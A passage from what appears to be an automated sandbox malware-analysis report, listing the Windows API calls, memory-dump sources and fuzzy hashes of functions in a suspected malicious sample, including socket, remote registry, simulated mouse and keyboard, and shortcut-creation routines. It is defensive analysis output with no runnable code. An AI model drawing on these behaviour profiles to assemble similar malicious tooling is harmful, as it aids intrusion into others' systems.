                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 3495660284-0
                                                                                              • Opcode ID: b95f3b4c5613fd209b30fd8ccf6367f8a62706918f832dc6b9b749ab83116704
                                                                                              • Instruction ID: 9ceb9844e07872bdc5b16b4d1fc481883bdaaaec47307500c610061901cb0535
                                                                                              • Opcode Fuzzy Hash: b95f3b4c5613fd209b30fd8ccf6367f8a62706918f832dc6b9b749ab83116704
                                                                                              • Instruction Fuzzy Hash: 0FF03C32442A12FBD7655B64EE4CBDA7B3AFF01302F502025F202958A0C7749676CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0061271D
                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0061273E
                                                                                              • WSAGetLastError.WSOCK32 ref: 0061274F
                                                                                              • htons.WSOCK32(?,?,?,?,?), ref: 00612838
                                                                                              • inet_ntoa.WSOCK32(?), ref: 006127E9
                                                                                                • Part of subcall function 005F4277: _strlen.LIBCMT ref: 005F4281
                                                                                                • Part of subcall function 00613B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0060F569), ref: 00613B9D
                                                                                              • _strlen.LIBCMT ref: 00612892
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 3203458085-0
                                                                                              • Opcode ID: 29f751105eb9e5929b3582e82439726855de6930559bf23272200913d98e04d6
                                                                                              • Instruction ID: ccb61fd44674f87e6b4ca6e9cd18ef7d0f3c9b3ee6e3675937d11d810849c8e5
                                                                                              • Opcode Fuzzy Hash: 29f751105eb9e5929b3582e82439726855de6930559bf23272200913d98e04d6
                                                                                              • Instruction Fuzzy Hash: 41B1E575204302AFD714DF24C8A9EAA7BA6BF84314F58854CF4564B3E2DB31ED86CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __allrem.LIBCMT ref: 005C044A
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C0466
                                                                                              • __allrem.LIBCMT ref: 005C047D
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C049B
                                                                                              • __allrem.LIBCMT ref: 005C04B2
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C04D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                              • String ID:
                                                                                              • API String ID: 1992179935-0
                                                                                              • Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                                                              • Instruction ID: 73e16c9238c003f2106793022ab460b984de0068c65bdd19e1ca5acfe12248f6
                                                                                              • Opcode Fuzzy Hash: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                                                              • Instruction Fuzzy Hash: 3B81D572600706DFEB249EADCC86F6B7BA8BF90764F24552EF611D62C1E770D9018B50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005B8669,005B8669,?,?,?,005C67DF,00000001,00000001,8BE85006), ref: 005C65E8
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,005C67DF,00000001,00000001,8BE85006,?,?,?), ref: 005C666E
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005C6768
                                                                                              • __freea.LIBCMT ref: 005C6775
                                                                                                • Part of subcall function 005C3BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,005B6A99,?,0000015D,?,?,?,?,005B85D0,000000FF,00000000,?,?), ref: 005C3BE2
                                                                                              • __freea.LIBCMT ref: 005C677E
                                                                                              • __freea.LIBCMT ref: 005C67A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: 5c8adea203154dffdb84779bc4603d9760aece2ba4f0b85a972f9679dbdcebdf
                                                                                              • Instruction ID: 8a8881e2aae7da05a3387d19ba171769bd3875fc5ab306896ad93ac7bb277939
                                                                                              • Opcode Fuzzy Hash: 5c8adea203154dffdb84779bc4603d9760aece2ba4f0b85a972f9679dbdcebdf
                                                                                              • Instruction Fuzzy Hash: 0E51BF72600216AFEB258FA4CC85FAA7FFAFB84754F144A2DF805D6150EB34DE50C691
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269
                                                                                                • Part of subcall function 0061D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0061C00D,?,?), ref: 0061D314
                                                                                                • Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D350
                                                                                                • Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D3C7
                                                                                                • Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D3FD
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061C629
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0061C684
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0061C6C9
                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0061C6F8
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0061C752
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0061C75E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                              • String ID:
                                                                                              • API String ID: 1120388591-0
                                                                                              • Opcode ID: 4312deb8a6bb9dfd221fb30fe0676c5ce14d718d470ac9e2f6d76d64cdbfad7d
                                                                                              • Instruction ID: b6d0546a2d70fb1c7d587831ea9757243f01cdec160db59318de6e2ee95df9b1
                                                                                              • Opcode Fuzzy Hash: 4312deb8a6bb9dfd221fb30fe0676c5ce14d718d470ac9e2f6d76d64cdbfad7d
                                                                                              • Instruction Fuzzy Hash: 1E818D70208341AFD714DF24C895EAABBE6FF84318F18855CF4558B2A2DB71ED46CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(00000035), ref: 005F0049
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 005F00F0
                                                                                              • VariantCopy.OLEAUT32(005F02F4,00000000), ref: 005F0119
                                                                                              • VariantClear.OLEAUT32(005F02F4), ref: 005F013D
                                                                                              • VariantCopy.OLEAUT32(005F02F4,00000000), ref: 005F0141
                                                                                              • VariantClear.OLEAUT32(?), ref: 005F014B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCopy$AllocInitString
                                                                                              • String ID:
                                                                                              • API String ID: 3859894641-0
                                                                                              • Opcode ID: 49821a2c42f763ce7784d2e2acfffc2a4da312fd31ccd7ba3c642144d62046a1
                                                                                              • Instruction ID: 52f53a4e2fd4cf4fbd63d0021efc0e6a2f5edab97aa5a4233295ce9136a45618
                                                                                              • Opcode Fuzzy Hash: 49821a2c42f763ce7784d2e2acfffc2a4da312fd31ccd7ba3c642144d62046a1
                                                                                              • Instruction Fuzzy Hash: 5D511A35540305AADF20AB64DC99B39BBE9FF85310B18A406EA01DF2D7DB789C40CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00606E36
                                                                                              • CoInitialize.OLE32(00000000), ref: 00606F93
                                                                                              • CoCreateInstance.OLE32(00630CC4,00000000,00000001,00630B34,?), ref: 00606FAA
                                                                                              • CoUninitialize.OLE32 ref: 0060722E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 886957087-24824748
                                                                                              • Opcode ID: ffcb3ff3cc0f35f66c2255cba9cce922f02c301062964375d24c631d9cfca0f0
                                                                                              • Instruction ID: ee364b6350a8fc2494b6d6a8d59cfc9e015768815dcfc36d0d93a53e35057318
                                                                                              • Opcode Fuzzy Hash: ffcb3ff3cc0f35f66c2255cba9cce922f02c301062964375d24c631d9cfca0f0
                                                                                              • Instruction Fuzzy Hash: 7AD15771608302AFD704EF24D8859ABBBE9FF95704F04495DF1858B2A2DB71ED06CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 006010C8
                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00601103
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0060111F
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00601198
                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 006011AF
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 006011DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                              • String ID:
                                                                                              • API String ID: 3368777196-0
                                                                                              • Opcode ID: c35cf446e01959b187a784ffac4723aacda2a6da649e724dff5f722021be0fd0
                                                                                              • Instruction ID: 3e2e27a243d32913c4fe4d064fca31a5db7acf90a5217991881a26a51180f752
                                                                                              • Opcode Fuzzy Hash: c35cf446e01959b187a784ffac4723aacda2a6da649e724dff5f722021be0fd0
                                                                                              • Instruction Fuzzy Hash: C3415E71900205EBDF189F58DD85AAB7BB9FF44304F1480A5EE009E296D730EE51CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,005EFB8F,00000000,?,?,00000000,?,005D39BC,00000004,00000000,00000000), ref: 00628BAB
                                                                                              • EnableWindow.USER32(?,00000000), ref: 00628BD1
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00628C30
                                                                                              • ShowWindow.USER32(?,00000004), ref: 00628C44
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00628C6A
                                                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00628C8E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 642888154-0
                                                                                              • Opcode ID: 704cf2474788d7072d877cb301932da5bb4a97442f50922ef712dba3471ba46d
                                                                                              • Instruction ID: d4efcf173ca4060d2bf2c7afd4997acbc3105d415356f4853e172b4bca486550
                                                                                              • Opcode Fuzzy Hash: 704cf2474788d7072d877cb301932da5bb4a97442f50922ef712dba3471ba46d
                                                                                              • Instruction Fuzzy Hash: 1E419374603954AFDB26CF14EC99BE17BE2BB45315F1851A9E5084F362CB71A841CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 00612C45
                                                                                                • Part of subcall function 0060EE49: GetWindowRect.USER32(?,?), ref: 0060EE61
                                                                                              • GetDesktopWindow.USER32 ref: 00612C6F
                                                                                              • GetWindowRect.USER32(00000000), ref: 00612C76
                                                                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00612CB2
                                                                                              • GetCursorPos.USER32(?), ref: 00612CDE
                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00612D3C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                              • String ID:
                                                                                              • API String ID: 2387181109-0
                                                                                              • Opcode ID: d64713c1a9562809f9296c378abaf32cd1c12d627292d4af62d4cedde9968342
                                                                                              • Instruction ID: 08ed4ed72cee3ccec5345b6dd4f92796c558168a84e3f46b8de9ddcfa7a1bf81
                                                                                              • Opcode Fuzzy Hash: d64713c1a9562809f9296c378abaf32cd1c12d627292d4af62d4cedde9968342
                                                                                              • Instruction Fuzzy Hash: BC31DE72504316ABD720DF14C849E9ABBAAFFC4314F04091AF985A7281CB30E959CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00595558,?,?,005D4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0059559E
                                                                                              • _wcslen.LIBCMT ref: 006061D5
                                                                                              • CoInitialize.OLE32(00000000), ref: 006062EF
                                                                                              • CoCreateInstance.OLE32(00630CC4,00000000,00000001,00630B34,?), ref: 00606308
                                                                                              • CoUninitialize.OLE32 ref: 00606326
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 3172280962-24824748
                                                                                              • Opcode ID: 512050eba28306613e7b1bf499b227b2e88e1c7f7078c06b13a2e7dea70c2d95
                                                                                              • Instruction ID: e3ede9d388accf46c648f4288435dea50fc0feb965649df3c756a3b6f11dbcec
                                                                                              • Opcode Fuzzy Hash: 512050eba28306613e7b1bf499b227b2e88e1c7f7078c06b13a2e7dea70c2d95
                                                                                              • Instruction Fuzzy Hash: FAD142756042019FCB18DF24C494A6BBBE6FF89714F14885CF8869B3A1CB31ED45CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00000000,005B4D73,00000000,?,?,005B6902,?,?,00000000), ref: 005C3108
                                                                                              • _free.LIBCMT ref: 005C313B
                                                                                              • _free.LIBCMT ref: 005C3163
                                                                                              • SetLastError.KERNEL32(00000000,?,00000000), ref: 005C3170
                                                                                              • SetLastError.KERNEL32(00000000,?,00000000), ref: 005C317C
                                                                                              • _abort.LIBCMT ref: 005C3182
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: bff3ac70b307c77fbb6b56ee74df282a27492024049e162ebd183617ab2f3b5b
                                                                                              • Instruction ID: d6710dffbb2ad49bc24eb39d9bab5d5faaa440e2cc3b622440483f976cb007fd
                                                                                              • Opcode Fuzzy Hash: bff3ac70b307c77fbb6b56ee74df282a27492024049e162ebd183617ab2f3b5b
                                                                                              • Instruction Fuzzy Hash: 1DF0F931504A056ED33263F4AC0EF5A2E6ABFD6761F29881CF415D21D1FF208A43C151
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00593236
                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 0059323E
                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00593249
                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00593254
                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 0059325C
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00593264
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual
                                                                                              • String ID:
                                                                                              • API String ID: 4278518827-0
                                                                                              • Opcode ID: afa9d6aacb8b3c598b083e4e66580860aefb7fc297cb37694bf875469409ea80
                                                                                              • Instruction ID: 7bb845c98be780c6af44cef954ac00fd4dd59f65fd010dd8606d020ab9e5c37c
                                                                                              • Opcode Fuzzy Hash: afa9d6aacb8b3c598b083e4e66580860aefb7fc297cb37694bf875469409ea80
                                                                                              • Instruction Fuzzy Hash: BC0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005F210F
                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 005F211B
                                                                                              • CloseHandle.KERNEL32(?), ref: 005F2124
                                                                                              • CloseHandle.KERNEL32(?), ref: 005F212C
                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 005F2135
                                                                                              • HeapFree.KERNEL32(00000000), ref: 005F213C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                              • String ID:
                                                                                              • API String ID: 146765662-0
                                                                                              • Opcode ID: fce6aac9a9568ed4a3180cbd60a994714beaa764fa508c265242d711b74c0b49
                                                                                              • Instruction ID: 7c1f44314fa93481a751cdaaac67e53c2916b4854bfb757ce40b06f2aa2dac8b
                                                                                              • Opcode Fuzzy Hash: fce6aac9a9568ed4a3180cbd60a994714beaa764fa508c265242d711b74c0b49
                                                                                              • Instruction Fuzzy Hash: 94E01A76004902BFDB115FA1ED0CD0ABF3BFF49322B105220F22586474CB329432DB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00594154: _wcslen.LIBCMT ref: 00594159
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005FCEAE
                                                                                              • _wcslen.LIBCMT ref: 005FCEF5
                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005FCF5C
